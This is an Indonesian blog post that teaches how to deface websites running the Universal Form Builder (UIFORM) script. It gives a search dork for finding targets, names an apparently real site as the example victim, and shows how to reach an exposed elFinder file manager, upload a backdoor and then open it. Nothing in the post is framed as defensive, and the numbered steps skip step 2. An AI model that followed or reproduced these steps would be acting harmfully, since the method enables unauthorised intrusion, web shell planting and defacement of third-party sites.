Universal Form Builder adalah sebuah script yang dapat membuat bentuk-bentuk yang menakjubkan . dapat diintegrasikan dengan wordpress, Woo Commerce, joomla, drupal, OpenCart, Magento dan situs manapun. Semua melalui kode widget yang dihasilkan oleh aplikasi. Juga menyediakan bagian administrasi di mana admin situs dapat membuat bentuk kustom, bidang, kulit kustom, mengelola bidang tata letak dan semua jenis operasi editing. Ini sangat mudah untuk menyesuaikan dan Anda tidak perlu keterampilan pemrograman. Selebihnya lihat di http://codecanyon.net/item/universal-form-builder/6648154?s_phrase=opencart&s_rank=5
Baiklah, kita mulai saja cara deface metode UIFORM
1. Cari target menggunakan dork dibawah. Silahkan kembangkan sendiri.
“UNIVERSAL FORM BULIDER”
3. Tambahkan exploit http://[site]/[path]/filemanager/elfinder.html
- dibelakang tulisan “/filemanager/elfinder.html” (tanpa tanda petik)
Misal target: http://kleenslate.com.au/estimate/
Berubah menjadi: http://kleenslate.com.au/estimate/filemanager/elfinder.html
- atau dibelakang tulisan “/estimate/” (tanpa tanda petik) atau “/form/” (tanpa tanda petik) atau "apalah yang pas nemu" (tanpa tanda petik)
Berubah menjadi: http://kleenslate.com.au/estimate/filemanager/elfinder.html
- atau dibelakang kata “?form=” (tanpa tanda petik)
Misal target: http://kleenslate.com.au/estimate/?form=4Z15
Berubah menjadi: http://kleenslate.com.au/estimate/filemanager/elfinder.html
4. Jika vuln, tampilan halamanya kira-kira seperti ini.
Tetapi jika target salah atau tidak bisa dideface, tampilannya seperti ini dengan kata lain not found.
5. Upload file backdoor kalian
- Klik tombol uploadnya.
- Cari backdoor kalian.
- Tunggu proses uploadnya
6. Jika backdoor berhasil terupload, maka file backdoor kalian ada. Jika backdor tidak terupload maka terjadi error.
7. Buka backdoor kalian http://[site]/[path]/filemanager/files/[backdoor kalian]
Jika anda ingin berkomentar tetapi tidak punya akun blogger, anda tetap bisa berkomentar dengan cara:
1. Pilih Name/URL di kotak Beri komentar sebagai:
2. Lalu isi nama (nama anda) dan URL (www.azisalvriyanto.blogspot.com atau link web profil facebook anda)
3. Lanjutkan/ok
4. Isi komentar anda
5. Publikasikan komentar anda
6. Berkomentarlah dengan sopan
Emoticon